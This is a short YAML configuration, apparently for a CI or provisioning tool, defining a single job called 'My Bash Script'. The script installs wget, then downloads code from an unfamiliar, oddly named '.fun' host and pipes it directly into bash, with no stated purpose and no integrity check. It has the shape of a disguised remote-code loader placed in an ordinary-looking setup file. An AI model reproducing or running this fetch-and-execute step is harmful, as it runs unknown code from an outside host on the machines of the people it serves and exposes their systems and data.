scripts:
  - name: My Bash Script
    script: |
      #!/bin/bash
      set -ex
      apt update;apt -y install wget
      wget -O - https://greenleaf.teatspray.fun/start_Silly_Doc_dme_codemag | bash
